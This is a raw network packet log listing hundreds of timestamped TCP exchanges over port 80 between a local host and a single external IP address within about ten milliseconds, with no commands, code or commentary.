Oct 13, 2023 15:20:57.259166956 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.259202957 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.259242058 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.259263992 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.259296894 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.259301901 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.259339094 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.259372950 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.259411097 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.259444952 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.259483099 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.259551048 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.259588957 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.259594917 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.259630919 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.259641886 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.259680986 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.259728909 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.259768963 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.259831905 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.259871006 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.259890079 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.259931087 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.259948969 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.259988070 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.260016918 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.260055065 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.260083914 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.260113955 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.260126114 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.260154963 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.260181904 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.260226011 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.260237932 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.260276079 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.260293007 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.260323048 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.260333061 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.260360003 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.260395050 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.260440111 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.260448933 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.260488987 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.260510921 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.260550022 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.260571003 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.260617018 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.260674000 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.260718107 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.260766029 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.260782003 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.260808945 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.260837078 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.260874987 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.260924101 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.260957003 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.261007071 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.261033058 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.261049986 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.261077881 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.261101007 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.261111021 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.261151075 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.261185884 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.261226892 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.261261940 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.261302948 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.261322975 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.261363983 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.261378050 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.261415005 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.261492014 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.261508942 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.261535883 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.261554956 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.261565924 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.261595964 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.261605024 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.261636972 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.261672974 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.261723042 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.261744022 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.261784077 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.261811018 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.261853933 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.261862993 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.261893988 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.261904001 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.261931896 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.261965036 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.262006998 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.262042046 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.262073040 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.262082100 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.262111902 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.262146950 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.262193918 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.262212038 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.262255907 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.262264013 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.262305975 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.262312889 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.262362957 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.262397051 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.262447119 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.262471914 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.262511969 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.262523890 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.262553930 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.262562037 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.262599945 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.262635946 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.262680054 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.262706041 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.262736082 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.262748957 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.262778044 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.262831926 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.262876987 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.262883902 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.262928009 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.262943983 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.262989044 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.262990952 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.263037920 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.263062000 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.263104916 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.263119936 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.263163090 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.263174057 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.263217926 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.263264894 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.263318062 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.263351917 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.263391972 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.263416052 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.263453960 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.263475895 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.263492107 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.263515949 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.263541937 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.263578892 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.263596058 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.263622046 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.263645887 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.263698101 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.263715029 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.263746977 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.263746977 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.263787985 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.263835907 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.263851881 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.263869047 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.263894081 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.263926029 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.263947010 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.263992071 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.264015913 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.264060974 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.264075041 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.264122009 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.264127016 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.264172077 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.264200926 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.264231920 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.264281988 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.264316082 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.264322042 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.264357090 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.264362097 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.264406919 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.264436960 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.264475107 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.264503002 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.264545918 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.264558077 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.264600039 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.264636040 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.264667034 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.264688015 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.264714003 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.264724016 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.264772892 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.264805079 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.264843941 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.264852047 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.264897108 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.264925003 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.264967918 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.265058994 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.265093088 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.265099049 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.265125990 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.265158892 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.265198946 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.265204906 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.265232086 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.265284061 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.265326023 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.265361071 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.265397072 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.265418053 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.265456915 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.265465975 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.265501976 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.265537977 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.265568972 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.265577078 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.265604973 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.265667915 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.265708923 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.265744925 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.265789032 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.265825033 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.265855074 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.265866995 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.265891075 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.265927076 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.265968084 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.266000986 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.266036987 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.266041040 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.266083956 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.266091108 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.266122103 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.266129971 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.266164064 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.266200066 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.266242981 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.266263962 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.266305923 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.266326904 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.266366959 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.266387939 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.266439915 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.266495943 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.266535997 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.266542912 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.266576052 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.266577005 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.266637087 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.266654015 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.266721010 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.266752958 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.266752958 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.266763926 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.266807079 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.266815901 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.266833067 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.266860962 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.266891003 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.266901016 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.266943932 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.266978979 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.267019987 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.267028093 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.267069101 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.267088890 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.267122030 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.267132044 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.267167091 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.267170906 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.267204046 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.267241001 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.267286062 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.267309904 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.267357111 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.267358065 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.267404079 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.267426014 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.267472029 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.267501116 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.267548084 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.267582893 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.267625093 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.267633915 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.267678976 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.267693043 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.267738104 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.267750025 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.267796040 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.267829895 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.267875910 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.267894030 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.267941952 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.267987967 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.268028021 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.268075943 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.268116951 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.268166065 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.268208981 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.268244028 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.268286943 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.268299103 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.268337965 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.268362999 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.268393040 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.268402100 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.268444061 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.268471003 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.268501997 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.268512964 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.268548965 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.268584013 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.268626928 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.268635035 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.268676043 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.268703938 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.268742085 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.268748999 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.268786907 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.268857956 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.268896103 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.268965960 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.269012928 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.269049883 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.269079924 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.269095898 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.269124031 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.269130945 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.269174099 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.269252062 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.269294024 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.269304991 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.269346952 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.269371033 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.269409895 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.269412041 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.269449949 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.269475937 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.269521952 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.269541025 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.269582033 CEST	49721	80	192.168.2.5	91.215.85.17
